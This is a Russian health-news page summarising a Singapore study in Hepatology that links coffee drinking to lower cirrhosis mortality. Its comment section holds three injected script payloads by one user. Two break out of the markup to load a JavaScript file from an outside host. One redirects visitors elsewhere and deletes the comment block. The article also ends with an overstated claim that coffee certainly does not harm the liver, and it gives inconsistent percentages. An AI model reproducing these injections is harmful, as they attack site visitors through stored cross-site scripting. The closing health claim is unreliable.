Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бурно отметили праздник –...  >>  Бурно отметили праздник – пейте кофе
 
Обратная связь
 

Бурно отметили праздник – пейте кофе

Размер шрифта
12 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, кофе не только дарит заряд бодрости, но и защищает нашу печень. Результаты недавнего исследования говорят о том, что две чашки кофе в день могут снизить риск смерти от цирроза печени на 60%.

Бурно отметили праздник? Пейте кофе, чтобы сохранить печень!

Исследование было опубликовано в журнале Hepatology. Согласно его данным, употребление чая и фруктовых соков, в отличие от кофе, никак не связано со смертностью, в то время как алкогольные напитки только увеличивают риск смерти от цирроза печени.

По данным Всемирной Организации Здравоохранения, 1,3% всех смертей в год вызваны циррозом печени. 29 миллионов европейцев страдают от хронических заболеваний печени, а 17 000 смертей каждый год связаны с циррозом. Также цирроз печени является одиннадцатой по частоте причиной смертности в Соединенных Штатах.

«Наши результаты говорят о том, что кофе может уменьшать повреждение печени у людей с хроническими заболеваниями», – говорит ведущий автор работы доктор Вун-Пуай Ко из Национального Университета Сингапура. «Мы изучили влияние кофе, алкоголя, черного и зеленого чая, а также некоторых других безалкогольных напитков на смертность от цирроза печени».

В исследовании приняли участие 63 275 человек в возрасте от 45 до 74 лет, живущих в Сингапуре. Они предоставили ученым всю информацию о своем питании, образе жизни, а также все медицинские данные. За участниками эксперимента велось пристальное наблюдение в течение пятнадцати лет, в течение которых 14 928 (24%) из них умерли. 114 человек погибли по причине цирроза печени.

Согласно полученным данным, пациенты, которые ежедневно употребляли 20 и более грамм этилового спирта, имели более высокий риск смерти от цирроза по сравнению с непьющими пациентами. Употребление кофе, наоборот, снижало риск смерти, особенно от цирроза, не связанного с вирусными гепатитами. Риск умереть от цирроза у участников, которые пили две и более чашек кофе в день, снижался на 66%. Однако кофе никак не влияло на смертность от цирроза, вызванного вирусным гепатитом В. 

«Наше исследование впервые демонстрирует разницу влияния кофе на смертность от цирроза печени, вызванного различными причинами», – резюмирует доктор Ко. «Мы предполагаем, что положительный эффект кофе оказался менее выражен в азиатских странах, так как по статистике там цирроз печени чаще всего связан именно с вирусным гепатитом В.»

Возможно, в будущем эти исследования помогут врачам разработать новые препараты, защищающие нашу печень от повреждений. Но пока ясно одно – вы можете спокойно наслаждаться любимым напитком, вреда печени он точно не нанесет.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:21

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько можно выпить, чтобы не было рака печени   Хочешь выпить – запей кофе!   Для кого алкоголь опасней всего   Неалкогольная жировая болезнь печени  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 27 июля 2011В Москве за полгода от запоев погибли более 1000 человек
 
04 декабря 2012Ресвератрол не обладает полезным действием 12 августа 2011Только четверть россиян не пьет
 

Слайдшоу

1
Смертельно опасные продукты для печени
Мифы о похмелье
Как обследовать печень

Тесты

1
Что вы знаете о печени?
Есть ли у вас остеопороз?
Что вы знаете о цистите?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.